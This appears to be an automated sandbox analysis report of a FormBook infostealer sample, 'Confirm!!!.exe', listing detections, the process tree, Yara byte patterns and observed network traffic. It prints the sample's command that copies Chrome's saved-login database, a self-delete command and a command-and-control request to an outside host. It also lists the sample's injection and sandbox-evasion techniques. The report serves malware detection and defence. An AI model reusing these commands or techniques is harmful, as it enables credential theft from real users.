Loading ...

Play interactive tourEdit tour

Analysis Report Confirm!!!.exe

Overview

General Information

Sample Name:Confirm!!!.exe
Analysis ID:299313
MD5:a97e07fb4bf0fdc53cb010c14cfd4427
SHA1:a55756426c68efff0f4b68db7d03e79eb4c5f2ba
SHA256:231c67754beaf04b57ae055b9487d8148e0c7454d98ee0e2be8b13f367ff3a40
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Confirm!!!.exe (PID: 6812 cmdline: 'C:\Users\user\Desktop\Confirm!!!.exe' MD5: A97E07FB4BF0FDC53CB010C14CFD4427)
    • Confirm!!!.exe (PID: 6932 cmdline: {path} MD5: A97E07FB4BF0FDC53CB010C14CFD4427)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6796 cmdline: /c del 'C:\Users\user\Desktop\Confirm!!!.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6544 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ms9r74an.exe (PID: 1004 cmdline: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exe MD5: CFF235DAF3853E3DC31590A1EB01E27A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.Confirm!!!.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.Confirm!!!.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.Confirm!!!.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18429:$sqlite3step: 68 34 1C 7B E1
        • 0x1853c:$sqlite3step: 68 34 1C 7B E1
        • 0x18458:$sqlite3text: 68 38 2A 90 C5
        • 0x1857d:$sqlite3text: 68 38 2A 90 C5
        • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
        2.2.Confirm!!!.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.Confirm!!!.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x149a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14491:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14aa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14c1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1370c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa593:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19d17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ad1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1408, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, ProcessId: 6544

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: Confirm!!!.exeVirustotal: Detection: 25%Perma Link
          Source: Confirm!!!.exeReversingLabs: Detection: 37%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Fjdftnbgp\ms9r74an.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: Confirm!!!.exeJoe Sandbox ML: detected
          Source: 2.2.Confirm!!!.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,8_2_0087B89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008868BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,8_2_008868BA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0088245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,8_2_0088245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008931DC FindFirstFileW,FindNextFileW,FindClose,8_2_008931DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008785EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_008785EA
          Source: global trafficHTTP traffic detected: GET /3iw/?wh=fVcxXbr1VFY0vJdP1J5nZP1yS3y9jR0OedObz6l5iNpCsakFdBfixoBrK4YuJJNL1pgQZhjOhQ==&DR=ypFHslT HTTP/1.1Host: www.safariflorist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: PLI-ASCH PLI-ASCH
          Source: global trafficHTTP traffic detected: GET /3iw/?wh=fVcxXbr1VFY0vJdP1J5nZP1yS3y9jR0OedObz6l5iNpCsakFdBfixoBrK4YuJJNL1pgQZhjOhQ==&DR=ypFHslT HTTP/1.1Host: www.safariflorist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.safariflorist.com
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cmd.exe, 00000008.00000003.388925094.0000000002B09000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico7
          Source: cmd.exe, 00000008.00000002.511727126.0000000003B0F000.00000004.00000001.sdmpString found in binary or memory: http://survey-smiles.com
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.264294955.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp=$~
          Source: cmd.exe, 00000008.00000003.388925094.0000000002B09000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEMh
          Source: cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpin
          Source: cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpK.
          Source: cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpcLMEMph
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.271581706.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmp, cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmp, cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmp, cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmp, cmd.exe, 00000008.00000003.388925094.0000000002B09000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmp, cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
          Source: cmd.exe, 00000008.00000003.388925094.0000000002B09000.00000004.00000001.sdmp, cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
          Source: cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
          Source: cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
          Source: cmd.exe, 00000008.00000003.388925094.0000000002B09000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1r
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wrep
          Source: cmd.exe, 00000008.00000003.388925094.0000000002B09000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
          Source: cmd.exe, 00000008.00000003.385865730.0000000002AEE000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/n$
          Source: cmd.exe, 00000008.00000002.508078960.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\-Q928--Q\-Q9logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\-Q928--Q\-Q9logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.288073029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.288390051.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.506851643.00000000028F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.505585690.0000000000820000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.288371547.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.507682099.0000000002AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.251271750.0000000003E7F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Confirm!!!.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Confirm!!!.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00419830 NtCreateFile,2_2_00419830
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_004198E0 NtReadFile,2_2_004198E0
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00419960 NtClose,2_2_00419960
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00419A10 NtAllocateVirtualMemory,2_2_00419A10
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041982D NtCreateFile,2_2_0041982D
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_004198DA NtReadFile,2_2_004198DA
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00419883 NtReadFile,2_2_00419883
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_0041995A NtClose,2_2_0041995A
          Source: C:\Users\user\Desktop\Confirm!!!.exeCode function: 2_2_00419A0B NtAllocateVirtualMemory,2_2_00419A0B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008758A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,8_2_008758A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_008784BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,8_2_008784BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087B4C0 NtQueryInformationToken,8_2_0087B4C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_0087B4F8 NtQueryInformationToken,NtQueryInformationToken,8_2_0087B4F8
